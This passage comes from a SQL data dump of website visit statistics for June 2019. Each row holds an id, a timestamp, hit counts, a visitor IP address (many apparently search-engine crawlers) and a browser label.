'other'),(429101,1560835607,1,1,0,0,'66.249.66.66','chrome'),(429102,1560835632,3,3,0,0,'66.249.66.136','chrome'),(429103,1560835765,1,1,0,0,'66.249.66.68','chrome'),(429104,1560835816,4,4,0,0,'66.249.66.134','chrome'),(429105,1560836068,1,1,0,0,'66.249.66.138','chrome'),(429106,1560836212,1,1,0,0,'91.196.178.76','chrome'),(429107,1560836232,1,1,0,0,'91.196.178.190','chrome'),(429108,1560837130,1,1,0,0,'91.196.178.76','chrome'),(429109,1560837189,1,1,0,0,'66.249.66.66','chrome'),(429110,1560837284,1,1,0,0,'207.46.13.86','other'),(429111,1560837295,1,1,0,0,'91.92.109.43','other'),(429112,1560837394,1,1,0,0,'91.196.178.74','chrome'),(429113,1560837559,1,1,0,0,'91.196.177.46','chrome'),(429114,1560837605,1,1,0,0,'66.249.66.136','chrome'),(429115,1560838023,1,1,0,0,'40.77.167.38','other'),(429116,1560838292,1,1,0,0,'207.46.13.86','other'),(429117,1560838700,6,6,0,0,'66.249.66.134','chrome'),(429118,1560838864,2,2,0,0,'66.249.66.138','chrome'),(429119,1560838873,2,2,0,0,'66.249.66.136','chrome'),(429120,1560839210,1,1,0,0,'91.196.178.74','chrome'),(429121,1560839429,1,1,0,0,'91.196.178.76','chrome'),(429122,1560840632,1,1,0,0,'40.77.167.38','other'),(429123,1560841052,3,3,0,0,'66.249.66.136','chrome'),(429124,1560841055,2,2,0,0,'66.249.66.138','chrome'),(429125,1560841556,1,1,0,0,'91.196.178.190','chrome'),(429126,1560841724,1,1,0,0,'77.222.143.222','msie'),(429127,1560841745,1,1,0,0,'66.249.66.64','chrome'),(429128,1560841762,1,1,0,0,'207.46.13.213','other'),(429129,1560841766,1,1,0,0,'40.77.167.83','other'),(429130,1560842346,1,1,0,0,'66.249.66.66','chrome'),(429131,1560842855,1,1,0,0,'91.196.178.169','chrome'),(429132,1560843206,3,3,0,0,'66.249.66.136','chrome'),(429133,1560843284,1,1,0,0,'141.8.142.144','other'),(429134,1560843469,1,1,0,0,'66.249.66.134','chrome'),(429135,1560843478,1,1,0,0,'91.196.178.76','firefox'),(429136,1560843631,1,1,0,0,'8.29.198.25','other'),(429137,1560843996,1,1,0,0,'8.29.198.27','other'),(429138,1560844348,1,1,0,0,'46.96.50.175','chrome'),(429139,1560844423,1,1,0,0,'207.46.13.213','other'),(429140,1560844840,2,2,0,0,'157.55.39.187','other'),(429141,1560844895,1,1,0,0,'66.249.66.88','chrome'),(429142,1560844898,1,1,0,0,'66.249.66.138','chrome'),(429143,1560844983,1,1,0,0,'207.46.13.176','other'),(429144,1560845042,1,1,0,0,'66.249.66.136','chrome'),(429145,1560845164,1,1,0,0,'91.196.178.76','firefox'),(429146,1560845428,1,1,0,0,'157.55.39.96','other'),(429147,1560845472,1,1,0,0,'95.163.255.97','other'),(429148,1560846089,1,1,0,0,'157.55.39.187','other'),(429149,1560846157,1,1,0,0,'95.163.255.170','other'),(429150,1560846163,1,1,0,0,'95.163.255.181','other'),(429151,1560846170,1,1,0,0,'95.163.255.165','other'),(429152,1560846950,1,1,0,0,'66.249.66.66','chrome'),(429153,1560846974,1,1,0,0,'66.249.66.136','chrome'),(429154,1560847029,1,1,0,0,'66.249.66.138','chrome'),(429155,1560847120,1,1,0,0,'66.249.66.134','chrome'),(429156,1560847149,1,1,0,0,'78.111.185.129','chrome'),(429157,1560847174,1,1,0,0,'37.73.233.182','chrome'),(429158,1560847307,1,1,0,0,'66.249.66.64','chrome'),(429159,1560847803,1,1,0,0,'46.211.131.242','chrome'),(429160,1560848374,1,1,0,0,'66.249.66.138','chrome'),(429161,1560849091,1,1,0,0,'91.196.178.74','chrome'),(429162,1560849152,4,4,0,0,'66.249.66.134','chrome'),(429163,1560849533,1,1,0,0,'207.46.13.176','other'),(429164,1560849586,1,1,0,0,'157.55.39.187','other'),(429165,1560849661,3,3,0,0,'66.249.66.136','chrome'),(429166,1560850151,2,2,0,0,'66.249.66.138','chrome'),(429167,1560850361,1,1,0,0,'91.196.178.76','firefox'),(429168,1560850414,4,4,0,0,'91.196.178.94','chrome'),(429169,1560850448,1,1,0,0,'95.163.255.98','other'),(429170,1560850632,2,2,0,0,'40.77.167.21','other'),(429171,1560850681,1,1,0,0,'40.77.167.143','other'),(429172,1560850879,1,1,0,0,'213.180.203.40','other'),(429173,1560851006,1,1,0,0,'66.249.66.134','chrome'),(429174,1560851078,1,1,0,0,'62.210.83.78','firefox'),(429175,1560851589,1,1,0,0,'40.77.167.21','other'),(429176,1560851974,1,1,0,0,'91.196.179.65','chrome'),(429177,1560852526,1,1,0,0,'157.55.39.187','other'),(429178,1560852726,1,1,0,0,'31.43.13.3','chrome'),(429179,1560852821,1,1,0,0,'109.74.154.72','chrome'),(429180,1560852844,1,1,0,0,'5.45.207.80','other'),(429181,1560853417,2,2,0,0,'40.77.167.21','other'),(429182,1560853458,2,2,0,0,'66.249.66.136','chrome'),(429183,1560853561,1,1,0,0,'66.249.66.66','chrome'),(429184,1560854050,1,1,0,0,'66.249.66.64','chrome'),(429185,1560854484,2,2,0,0,'8.29.198.26','other'),(429186,1560854588,1,1,0,0,'157.55.39.108','other'),(429187,1560855047,1,1,0,0,'157.55.39.187','other'),(429188,1560855181,1,1,0,0,'66.249.66.64','chrome'),(429189,1560855675,3,3,0,0,'91.196.178.190','chrome'),(429190,1560855994,1,1,0,0,'157.55.39.187','other'),(429191,1560856359,2,2,0,0,'40.77.167.21','other'),(429192,1560856954,1,1,0,0,'95.163.255.98','other'),(429193,1560856978,1,1,0,0,'176.9.9.94','other'),(429194,1560857339,1,1,0,0,'157.55.39.187','other'),(429195,1560857358,1,1,0,0,'66.249.66.64','chrome'),(429196,1560857557,1,1,0,0,'178.154.200.48','other'),(429197,1560857973,1,1,0,0,'91.196.178.94','firefox'),(429198,1560858036,1,1,0,0,'185.30.202.221','other'),(429199,1560858377,1,1,0,0,'91.196.177.46','chrome'),(429200,1560858697,1,1,0,0,'157.55.39.187','other'),(429201,1560858766,1,1,0,0,'5.45.207.19','other'),(429202,1560858997,1,1,0,0,'66.249.66.136','chrome'),(429203,1560859041,1,1,0,0,'40.77.167.21','other'),(429204,1560859053,1,1,0,0,'91.196.178.58','chrome'),(429205,1560859075,1,1,0,0,'46.211.53.66','chrome'),(429206,1560859242,1,1,0,0,'207.46.13.182','other'),(429207,1560859605,1,1,0,0,'91.196.178.76','chrome'),(429208,1560860013,1,1,0,0,'66.249.66.134','chrome'),(429209,1560860317,1,1,0,0,'157.55.39.187','other'),(429210,1560860648,1,1,0,0,'91.196.178.76','firefox'),(429211,1560861085,1,1,0,0,'66.249.66.68','chrome'),(429212,1560861086,1,1,0,0,'5.45.207.19','other'),(429213,1560861407,1,1,0,0,'40.77.167.38','other'),(429214,1560861477,2,2,0,0,'40.77.167.163','other'),(429215,1560861666,1,1,0,0,'95.163.255.92','other'),(429216,1560861671,1,1,0,0,'80.78.45.211','chrome'),(429217,1560861735,1,1,0,0,'95.163.255.97','other'),(429218,1560862146,2,2,0,0,'66.249.66.134','chrome'),(429219,1560862274,1,1,0,0,'66.249.66.138','chrome'),(429220,1560862414,1,1,0,0,'91.196.178.74','chrome'),(429221,1560862676,1,1,0,0,'95.163.255.98','other'),(429222,1560862913,1,1,0,0,'40.77.167.38','other'),(429223,1560862917,2,2,0,0,'207.46.13.182','other'),(429224,1560862922,3,3,0,0,'40.77.167.163','other'),(429225,1560863228,1,1,0,0,'95.163.255.177','other'),(429226,1560864529,1,1,0,0,'40.77.167.106','other'),(429227,1560865109,1,1,0,0,'178.154.244.11','other'),(429228,1560865320,1,1,0,0,'66.249.66.138','chrome'),(429229,1560865379,1,1,0,0,'8.29.198.26','other'),(429230,1560865779,1,1,0,0,'8.29.198.25','other'),(429231,1560865910,1,1,0,0,'207.46.13.182','other'),(429232,1560866143,1,1,0,0,'40.77.167.106','other'),(429233,1560866919,1,1,0,0,'91.196.178.76','firefox'),(429234,1560866963,1,1,0,0,'46.96.7.119','chrome'),(429235,1560867001,1,1,0,0,'207.46.13.182','other'),(429236,1560867156,2,2,0,0,'40.77.167.38','other'),(429237,1560867206,1,1,0,0,'46.211.131.6','chrome'),(429238,1560867367,1,1,0,0,'178.154.244.62','other'),(429239,1560867420,1,1,0,0,'141.8.142.74','other'),(429240,1560868322,1,1,0,0,'95.163.255.98','other'),(429241,1560868484,1,1,0,0,'209.17.97.58','other'),(429242,1560869008,1,1,0,0,'40.77.167.106','other'),(429243,1560869251,1,1,0,0,'66.249.66.134','chrome'),(429244,1560869420,2,2,0,0,'66.249.66.136','chrome'),(429245,1560870078,1,1,0,0,'141.8.142.103','other'),(429246,1560871528,1,1,0,0,'13.66.139.0','other'),(429247,1560871739,1,1,0,0,'40.77.167.38','other'),(429248,1560872430,1,1,0,0,'66.249.66.136','chrome'),(429249,1560872506,1,1,0,0,'207.46.13.182','other'),(429250,1560872955,1,1,0,0,'95.163.255.95','other'),(429251,1560873516,1,1,0,0,'80.78.250.17','chrome'),(429252,1560874019,1,1,0,0,'66.249.66.138','chrome'),(429253,1560874668,1,1,0,0,'37.9.113.103','other'),(429254,1560874864,1,1,0,0,'40.77.167.163','other'),(429255,1560875147,2,2,0,0,'45.64.1.97','chrome'),(429256,1560875422,1,1,0,0,'91.196.178.133','chrome'),(429257,1560875640,1,1,0,0,'37.73.236.221','chrome'),(429258,1560875785,1,1,0,0,'66.249.66.66','chrome'),(429259,1560876178,1,1,0,0,'91.196.178.181','chrome'),(429260,1560876249,1,1,0,0,'8.29.198.26','other'),(429261,1560876655,1,1,0,0,'8.29.198.25','other'),(429262,1560876706,24,24,0,0,'18.215.161.19','other'),(429263,1560877080,1,1,0,0,'66.249.66.136','chrome'),(429264,1560877632,13,13,0,0,'18.215.161.19','other'),(429265,1560877700,1,1,0,0,'40.77.167.198','other'),(429266,1560878052,1,1,0,0,'40.77.167.162','other'),(429267,1560878376,1,1,0,0,'180.76.15.28','other'),(429268,1560878489,1,1,0,0,'95.163.255.97','other'),(429269,1560878609,23,23,0,0,'18.215.161.19','other'),(429270,1560878624,1,1,0,0,'66.102.9.26','chrome'),(429271,1560879524,16,16,0,0,'18.215.161.19','other'),(429272,1560880430,7,7,0,0,'18.215.161.19','other'),(429273,1560880715,1,1,0,0,'176.9.9.94','other'),(429274,1560881428,2,2,0,0,'40.77.167.162','other'),(429275,1560882201,2,2,0,0,'66.249.66.136','chrome'),(429276,1560882332,4,4,0,0,'66.249.66.134','chrome'),(429277,1560882458,2,2,0,0,'37.54.114.236','chrome'),(429278,1560882575,2,2,0,0,'66.249.66.138','chrome'),(429279,1560883114,1,1,0,0,'40.77.167.162','other'),(429280,1560883427,1,1,0,0,'66.249.66.136','chrome'),(429281,1560883482,2,2,0,0,'66.249.66.134','chrome'),(429282,1560883529,2,2,0,0,'66.249.66.64','chrome'),(429283,1560883597,2,2,0,0,'66.249.66.138','chrome'),(429284,1560884317,1,1,0,0,'141.8.142.108','other'),(429285,1560884711,1,1,0,0,'207.46.13.19','other'),(429286,1560884850,1,1,0,0,'40.77.167.162','other'),(429287,1560885304,1,1,0,0,'95.163.255.94','other'),(429288,1560885425,1,1,0,0,'66.249.66.136','chrome'),(429289,1560885426,1,1,0,0,'66.249.66.138','chrome'),(429290,1560885496,1,1,0,0,'46.219.207.119','firefox'),(429291,1560885922,1,1,0,0,'95.163.255.177','other'),(429292,1560886091,1,1,0,0,'91.237.241.57','chrome'),(429293,1560886539,1,1,0,0,'40.77.167.137','other'),(429294,1560887111,2,2,0,0,'8.29.198.27','other'),(429295,1560887318,1,1,0,0,'66.249.66.134','chrome'),(429296,1560887416,1,1,0,0,'87.250.224.47','other'),(429297,1560887522,1,1,0,0,'40.77.167.162','other'),(429298,1560887670,24,24,0,0,'46.4.107.106','other'),(429299,1560887784,1,1,0,0,'2.62.212.237','chrome'),(429300,1560887922,2,2,0,0,'207.46.13.212','other'),(429301,1560888195,2,2,0,0,'66.249.66.64','chrome'),(429302,1560888317,1,1,0,0,'66.249.66.136','chrome'),(429303,1560888574,17,17,0,0,'46.4.107.106','other'),(429304,1560889124,1,1,0,0,'46.211.73.145','chrome'),(429305,1560889476,14,14,0,0,'46.4.107.106','other'),(429306,1560890024,1,1,0,0,'66.249.66.134','chrome'),(429307,1560890177,1,1,0,0,'91.196.178.101','chrome'),(429308,1560890359,1,1,0,0,'193.106.30.98','chrome'),(429309,1560890385,14,14,0,0,'46.4.107.106','other'),(429310,1560891180,1,1,0,0,'91.196.178.93','firefox'),(429311,1560891291,17,17,0,0,'46.4.107.106','other'),(429312,1560891397,1,1,0,0,'66.249.66.64','chrome'),(429313,1560891452,1,1,0,0,'157.55.39.65','other'),(429314,1560892032,2,2,0,0,'66.249.66.136','chrome'),(429315,1560892034,2,2,0,0,'66.249.66.134','chrome'),(429316,1560892196,13,13,0,0,'46.4.107.106','other'),(429317,1560893099,10,10,0,0,'46.4.107.106','other'),(429318,1560893992,2,2,0,0,'66.249.66.134','chrome'),(429319,1560894001,12,12,0,0,'46.4.107.106','other'),(429320,1560894004,1,1,0,0,'66.249.66.138','chrome'),(429321,1560894083,1,1,0,0,'87.250.224.64','other'),(429322,1560894426,1,1,0,0,'87.250.224.47','other'),(429323,1560894642,1,1,0,0,'40.77.167.137','other'),(429324,1560894904,18,18,0,0,'46.4.107.106','other'),(429325,1560894965,1,1,0,0,'157.55.39.52','other'),(429326,1560895805,10,10,0,0,'46.4.107.106','other'),(429327,1560895921,1,1,0,0,'40.77.167.196','other'),(429328,1560896208,1,1,0,0,'157.55.39.52','other'),(429329,1560896598,1,1,0,0,'95.163.255.94','other'),(429330,1560896701,1,1,0,0,'178.154.244.11','other'),(429331,1560896707,9,9,0,0,'46.4.107.106','other'),(429332,1560897114,1,1,0,0,'40.77.167.196','other'),(429333,1560897544,2,2,0,0,'66.249.66.136','chrome'),(429334,1560897594,1,1,0,0,'66.249.66.134','chrome'),(429335,1560897610,10,10,0,0,'46.4.107.106','other'),(429336,1560897959,2,2,0,0,'8.29.198.26','other'),(429337,1560898130,2,2,0,0,'157.55.39.52','other'),(429338,1560898961,1,1,0,0,'87.250.224.64','other'),(429339,1560899233,1,1,0,0,'66.249.66.138','chrome'),(429340,1560899243,1,1,0,0,'66.249.66.136','chrome'),(429341,1560899265,2,2,0,0,'66.249.66.134','chrome'),(429342,1560900728,1,1,0,0,'5.45.207.79','other'),(429343,1560900733,1,1,0,0,'37.9.113.103','other'),(429344,1560900779,1,1,0,0,'5.45.207.19','other'),(429345,1560900935,3,3,0,0,'66.249.66.136','chrome'),(429346,1560900941,1,1,0,0,'66.249.66.66','chrome'),(429347,1560901019,1,1,0,0,'66.249.66.134','chrome'),(429348,1560901101,1,1,0,0,'40.77.167.196','other'),(429349,1560901662,1,1,0,0,'37.9.113.148','other'),(429350,1560902626,1,1,0,0,'66.249.66.134','chrome'),(429351,1560902709,1,1,0,0,'141.8.142.103','other'),(429352,1560902950,1,1,0,0,'87.250.224.47','other'),(429353,1560903092,1,1,0,0,'5.45.207.79','other'),(429354,1560904234,1,1,0,0,'66.249.66.68','chrome'),(429355,1560904250,1,1,0,0,'66.249.66.138','chrome'),(429356,1560904251,2,2,0,0,'66.249.66.134','chrome'),(429357,1560904804,1,1,0,0,'37.9.113.103','other'),(429358,1560905039,2,2,0,0,'157.55.39.52','other'),(429359,1560905046,1,1,0,0,'157.55.39.118','other'),(429360,1560905512,1,1,0,0,'66.249.66.138','chrome'),(429361,1560905515,1,1,0,0,'66.249.66.64','chrome'),(429362,1560905547,2,2,0,0,'66.249.66.134','chrome'),(429363,1560906090,1,1,0,0,'157.55.39.118','other'),(429364,1560906190,1,1,0,0,'66.249.66.136','chrome'),(429365,1560906763,2,2,0,0,'66.249.66.66','chrome'),(429366,1560906807,1,1,0,0,'66.249.66.64','chrome'),(429367,1560907418,1,1,0,0,'87.250.224.64','other'),(429368,1560907954,1,1,0,0,'66.249.66.134','chrome'),(429369,1560908188,1,1,0,0,'95.163.255.98','other'),(429370,1560908802,1,1,0,0,'8.29.198.26','other'),(429371,1560908911,1,1,0,0,'66.249.66.134','chrome'),(429372,1560909285,1,1,0,0,'8.29.198.27','other'),(429373,1560909301,1,1,0,0,'141.8.142.103','other'),(429374,1560909518,1,1,0,0,'66.249.66.68','chrome'),(429375,1560909764,1,1,0,0,'77.222.143.222','msie'),(429376,1560911498,2,2,0,0,'66.249.66.134','chrome'),(429377,1560911764,1,1,0,0,'66.249.66.66','chrome'),(429378,1560912522,1,1,0,0,'95.163.255.98','other'),(429379,1560912532,1,1,0,0,'157.55.39.157','other'),(429380,1560913256,1,1,0,0,'51.158.122.201','firefox'),(429381,1560913851,1,1,0,0,'207.46.13.43','other'),(429382,1560913932,1,1,0,0,'46.211.134.109','chrome'),(429383,1560914128,1,1,0,0,'5.255.253.25','other'),(429384,1560914246,2,2,0,0,'66.249.66.134','chrome'),(429385,1560914303,1,1,0,0,'66.249.66.66','chrome'),(429386,1560914323,1,1,0,0,'66.249.66.136','chrome'),(429387,1560915664,1,1,0,0,'46.211.134.109','chrome'),(429388,1560916109,1,1,0,0,'207.46.13.43','other'),(429389,1560916235,1,1,0,0,'66.249.66.136','chrome'),(429390,1560916270,2,2,0,0,'66.249.66.134','chrome'),(429391,1560916505,1,1,0,0,'91.196.178.133','firefox'),(429392,1560916518,1,1,0,0,'178.154.244.11','other'),(429393,1560918278,2,2,0,0,'207.46.13.154','other'),(429394,1560918675,1,1,0,0,'40.77.167.141','other'),(429395,1560918974,1,1,0,0,'66.249.66.134','chrome'),(429396,1560919155,1,1,0,0,'5.45.207.8','other'),(429397,1560919609,1,1,0,0,'54.36.149.64','other'),(429398,1560919650,1,1,0,0,'8.29.198.25','other'),(429399,1560919792,1,1,0,0,'95.163.255.96','other'),(429400,1560920148,1,1,0,0,'8.29.198.27','other'),(429401,1560920616,2,2,0,0,'66.249.66.138','chrome'),(429402,1560920926,1,1,0,0,'130.180.216.82','chrome'),(429403,1560921286,1,1,0,0,'5.255.253.38','other'),(429404,1560921695,2,2,0,0,'207.46.13.133','other'),(429405,1560921959,1,1,0,0,'176.37.183.180','chrome'),(429406,1560922814,1,1,0,0,'78.109.23.2','other'),(429407,1560922896,2,2,0,0,'91.196.178.71','chrome'),(429408,1560923043,1,1,0,0,'77.111.244.103','chrome'),(429409,1560923346,1,1,0,0,'207.46.13.133','other'),(429410,1560923400,1,1,0,0,'91.196.178.93','firefox'),(429411,1560923641,1,1,0,0,'157.55.39.196','other'),(429412,1560923696,1,1,0,0,'198.27.67.17','firefox'),(429413,1560924048,1,1,0,0,'5.45.207.19','other'),(429414,1560924290,1,1,0,0,'87.250.224.64','other'),(429415,1560924759,1,1,0,0,'91.196.178.178','chrome'),(429416,1560924955,1,1,0,0,'54.36.149.57','other'),(429417,1560924964,1,1,0,0,'157.55.39.196','other'),(429418,1560925265,1,1,0,0,'157.55.39.174','other'),(429419,1560925616,1,1,0,0,'95.163.255.93','other'),(429420,1560925821,1,1,0,0,'91.196.178.173','chrome'),(429421,1560926223,1,1,0,0,'54.36.149.61','other'),(429422,1560926411,1,1,0,0,'54.36.149.10','other'),(429423,1560926932,1,1,0,0,'91.196.178.93','firefox'),(429424,1560927156,1,1,0,0,'91.196.178.12','chrome'),(429425,1560927414,1,1,0,0,'207.46.13.133','other'),(429426,1560927793,1,1,0,0,'95.132.49.152','chrome'),(429427,1560927866,1,1,0,0,'5.255.253.38','other'),(429428,1560927915,1,1,0,0,'213.180.203.9','other'),(429429,1560928562,1,1,0,0,'66.249.66.136','chrome'),(429430,1560928756,1,1,0,0,'40.84.140.119','chrome'),(429431,1560929759,1,1,0,0,'157.55.39.174','other'),(429432,1560929785,2,2,0,0,'207.46.13.133','other'),(429433,1560930065,1,1,0,0,'54.36.149.46','other'),(429434,1560930142,1,1,0,0,'37.9.113.20','other'),(429435,1560930511,1,1,0,0,'8.29.198.27','other'),(429436,1560930535,1,1,0,0,'195.95.232.146','chrome'),(429437,1560931007,1,1,0,0,'8.29.198.26','other'),(429438,1560931286,1,1,0,0,'157.55.39.196','other'),(429439,1560931356,1,1,0,0,'13.66.139.0','other'),(429440,1560931374,1,1,0,0,'66.249.66.134','chrome'),(429441,1560932080,1,1,0,0,'66.249.66.136','chrome'),(429442,1560932294,1,1,0,0,'185.154.72.12','other'),(429443,1560932609,1,1,0,0,'157.55.39.174','other'),(429444,1560932759,1,1,0,0,'54.36.149.98','other'),(429445,1560932796,1,1,0,0,'66.249.66.64','chrome'),(429446,1560932810,1,1,0,0,'66.249.66.66','chrome'),(429447,1560932850,1,1,0,0,'66.249.66.134','chrome'),(429448,1560933134,1,1,0,0,'95.28.190.165','msie'),(429449,1560933308,1,1,0,0,'66.249.66.136','chrome'),(429450,1560933553,1,1,0,0,'178.95.252.224','firefox'),(429451,1560933593,2,2,0,0,'207.46.13.133','other'),(429452,1560934075,1,1,0,0,'157.55.39.196','other'),(429453,1560934323,1,1,0,0,'178.154.244.11','other'),(429454,1560934413,1,1,0,0,'82.117.247.96','firefox'),(429455,1560934705,1,1,0,0,'91.196.177.46','chrome'),(429456,1560935262,1,1,0,0,'54.36.149.38','other'),(429457,1560936062,1,1,0,0,'66.249.66.134','chrome'),(429458,1560936261,1,1,0,0,'54.36.149.32','other'),(429459,1560936434,1,1,0,0,'178.92.227.241','chrome'),(429460,1560937046,1,1,0,0,'37.115.206.78','chrome'),(429461,1560937299,1,1,0,0,'54.36.149.54','other'),(429462,1560937997,1,1,0,0,'109.251.94.29','chrome'),(429463,1560938101,1,1,0,0,'95.163.255.93','other'),(429464,1560938230,2,2,0,0,'80.78.45.211','chrome'),(429465,1560938323,1,1,0,0,'54.36.149.0','other'),(429466,1560938887,1,1,0,0,'37.115.206.78','chrome'),(429467,1560939184,1,1,0,0,'54.36.149.10','other'),(429468,1560939330,1,1,0,0,'185.234.219.246','firefox'),(429469,1560939822,1,1,0,0,'109.74.154.72','chrome'),(429470,1560940251,2,2,0,0,'51.77.129.155','firefox'),(429471,1560940508,1,1,0,0,'54.36.149.98','other'),(429472,1560940701,2,2,0,0,'95.213.141.126','opera'),(429473,1560941059,1,1,0,0,'54.36.149.36','other'),(429474,1560941223,205,205,0,0,'78.46.149.254','other'),(429475,1560941264,1,1,0,0,'5.45.207.19','other'),(429476,1560941385,2,2,0,0,'8.29.198.26','other'),(429477,1560941870,2,2,0,0,'66.249.66.64','chrome'),(429478,1560942008,56,56,0,0,'95.216.20.54','other'),(429479,1560942134,1,1,0,0,'66.249.66.136','chrome'),(429480,1560942382,1,1,0,0,'157.55.39.196','other'),(429481,1560942914,1,1,0,0,'46.166.137.215','other'),(429482,1560942923,2,2,0,0,'13.66.139.0','other'),(429483,1560943027,1,1,0,0,'54.36.149.15','other'),(429484,1560943050,1,1,0,0,'178.154.244.11','other'),(429485,1560944681,1,1,0,0,'46.211.44.88','chrome'),(429486,1560946226,1,1,0,0,'40.77.167.140','other'),(429487,1560946473,1,1,0,0,'91.196.177.46','chrome'),(429488,1560947336,1,1,0,0,'40.77.167.143','other'),(429489,1560947901,1,1,0,0,'54.36.149.91','other'),(429490,1560948298,1,1,0,0,'180.76.15.142','other'),(429491,1560948596,1,1,0,0,'91.196.178.82','chrome'),(429492,1560948927,1,1,0,0,'212.111.198.100','opera'),(429493,1560949199,1,1,0,0,'91.196.178.190','chrome'),(429494,1560949447,1,1,0,0,'40.77.167.6','other'),(429495,1560949448,1,1,0,0,'66.249.66.64','chrome'),(429496,1560949859,1,1,0,0,'54.36.149.99','other'),(429497,1560950070,1,1,0,0,'176.9.9.94','other'),(429498,1560950463,1,1,0,0,'54.36.149.24','other'),(429499,1560950808,1,1,0,0,'91.196.178.82','chrome'),(429500,1560950829,1,1,0,0,'207.46.13.100','other'),(429501,1560951035,1,1,0,0,'157.55.39.59','other'),(429502,1560951784,1,1,0,0,'54.36.149.95','other'),(429503,1560951794,1,1,0,0,'40.77.167.33','other'),(429504,1560952182,1,1,0,0,'212.87.168.248','chrome'),(429505,1560952244,1,1,0,0,'8.29.198.25','other'),(429506,1560952293,1,1,0,0,'91.196.178.183','chrome'),(429507,1560952331,1,1,0,0,'54.36.149.59','other'),(429508,1560952734,1,1,0,0,'8.29.198.27','other'),(429509,1560953498,1,1,0,0,'54.36.149.16','other'),(429510,1560953557,1,1,0,0,'54.36.149.0','other'),(429511,1560954088,1,1,0,0,'13.66.139.0','other'),(429512,1560954091,1,1,0,0,'157.55.39.59','other'),(429513,1560954347,1,1,0,0,'207.46.13.100','other'),(429514,1560954713,1,1,0,0,'54.36.149.42','other'),(429515,1560955081,1,1,0,0,'207.46.13.151','other'),(429516,1560955418,1,1,0,0,'91.196.178.164','chrome'),(429517,1560955501,1,1,0,0,'157.55.39.59','other'),(429518,1560956240,1,1,0,0,'185.154.72.12','other'),(429519,1560956476,1,1,0,0,'54.36.149.95','other'),(429520,1560956516,1,1,0,0,'207.46.13.151','other'),(429521,1560956724,1,1,0,0,'206.253.224.14','other'),(429522,1560956866,3,3,0,0,'206.253.226.8','other'),(429523,1560957765,1,1,0,0,'54.36.149.97','other'),(429524,1560957767,1,1,0,0,'157.55.39.59','other'),(429525,1560958176,1,1,0,0,'37.73.244.153','chrome'),(429526,1560958266,1,1,0,0,'66.249.66.68','chrome'),(429527,1560958658,1,1,0,0,'207.46.13.151','other'),(429528,1560959001,1,1,0,0,'54.36.149.38','other'),(429529,1560959220,1,1,0,0,'54.36.149.40','other'),(429530,1560959260,1,1,0,0,'5.45.207.8','other'),(429531,1560960063,1,1,0,0,'66.249.66.66','chrome'),(429532,1560960296,2,2,0,0,'207.46.13.100','other'),(429533,1560960460,1,1,0,0,'40.77.167.118','other'),(429534,1560960782,2,2,0,0,'157.55.39.59','other'),(429535,1560960855,1,1,0,0,'54.36.149.1','other'),(429536,1560961021,1,1,0,0,'95.163.255.156','other'),(429537,1560961489,1,1,0,0,'54.36.149.82','other'),(429538,1560961618,1,1,0,0,'207.46.13.100','other'),(429539,1560961984,1,1,0,0,'54.36.149.5','other'),(429540,1560962524,1,1,0,0,'66.249.66.138','chrome'),(429541,1560962830,2,2,0,0,'157.55.39.69','other'),(429542,1560962903,3,3,0,0,'157.55.39.59','other'),(429543,1560963116,1,1,0,0,'8.29.198.26','other'),(429544,1560963602,1,1,0,0,'8.29.198.25','other'),(429545,1560963931,1,1,0,0,'54.36.149.66','other'),(429546,1560964461,1,1,0,0,'54.36.149.99','other'),(429547,1560964915,2,2,0,0,'40.77.167.118','other'),(429548,1560964953,1,1,0,0,'46.211.68.2','chrome'),(429549,1560965251,1,1,0,0,'54.36.149.36','other'),(429550,1560965253,1,1,0,0,'66.249.66.134','chrome'),(429551,1560966243,1,1,0,0,'91.196.178.181','chrome'),(429552,1560966405,1,1,0,0,'157.55.39.59','other'),(429553,1560967332,1,1,0,0,'66.249.66.136','chrome'),(429554,1560967628,1,1,0,0,'40.77.167.118','other'),(429555,1560967632,1,1,0,0,'157.55.39.69','other'),(429556,1560968126,1,1,0,0,'54.36.149.89','other'),(429557,1560968256,1,1,0,0,'157.55.39.59','other'),(429558,1560968432,1,1,0,0,'141.8.183.22','other'),(429559,1560969022,1,1,0,0,'46.243.220.36','chrome'),(429560,1560969668,1,1,0,0,'157.55.39.69','other'),(429561,1560969846,1,1,0,0,'195.154.222.29','firefox'),(429562,1560970081,1,1,0,0,'157.55.39.214','other'),(429563,1560970226,1,1,0,0,'54.36.149.54','other'),(429564,1560970358,1,1,0,0,'54.36.149.94','other'),(429565,1560970613,1,1,0,0,'157.55.39.59','other'),(429566,1560970877,1,1,0,0,'176.9.9.94','other'),(429567,1560972423,1,1,0,0,'46.219.228.134','chrome'),(429568,1560973156,1,1,0,0,'66.249.66.136','chrome'),(429569,1560973417,2,2,0,0,'66.249.66.138','chrome'),(429570,1560973978,1,1,0,0,'8.29.198.27','other'),(429571,1560974103,1,1,0,0,'54.36.149.106','other'),(429572,1560974191,1,1,0,0,'66.249.66.136','chrome'),(429573,1560974482,1,1,0,0,'8.29.198.25','other'),(429574,1560974519,1,1,0,0,'173.212.220.26','other'),(429575,1560975003,1,1,0,0,'66.249.66.138','chrome'),(429576,1560975385,3,3,0,0,'144.76.164.171','other'),(429577,1560975642,1,1,0,0,'157.55.39.214','other'),(429578,1560975959,1,1,0,0,'91.196.178.132','chrome'),(429579,1560976085,1,1,0,0,'157.55.39.243','other'),(429580,1560976852,1,1,0,0,'54.36.149.90','other'),(429581,1560977048,1,1,0,0,'54.36.149.57','other'),(429582,1560977233,1,1,0,0,'13.66.139.0','other'),(429583,1560977344,1,1,0,0,'207.46.13.79','other'),(429584,1560977362,1,1,0,0,'180.76.15.5','other'),(429585,1560978498,1,1,0,0,'207.46.13.79','other'),(429586,1560978717,1,1,0,0,'157.55.39.214','other'),(429587,1560979117,1,1,0,0,'54.36.149.90','other'),(429588,1560979540,1,1,0,0,'51.77.52.160','chrome'),(429589,1560980200,3,3,0,0,'157.55.39.59','other'),(429590,1560980739,1,1,0,0,'157.55.39.214','other'),(429591,1560980762,1,1,0,0,'54.36.149.62','other'),(429592,1560980967,1,1,0,0,'54.36.149.82','other'),(429593,1560981070,1,1,0,0,'54.36.149.94','other'),(429594,1560981675,1,1,0,0,'54.36.149.17','other'),(429595,1560981909,1,1,0,0,'66.249.66.134','chrome'),(429596,1560982026,1,1,0,0,'157.55.39.243','other'),(429597,1560982462,1,1,0,0,'54.36.149.0','other'),(429598,1560982918,1,1,0,0,'178.154.244.11','other'),(429599,1560983113,1,1,0,0,'54.36.149.42','other'),(429600,1560983837,1,1,0,0,'54.36.149.91','other'),(429601,1560983862,2,2,0,0,'157.55.39.243','other'),(429602,1560984222,1,1,0,0,'207.46.13.79','other'),(429603,1560984832,1,1,0,0,'8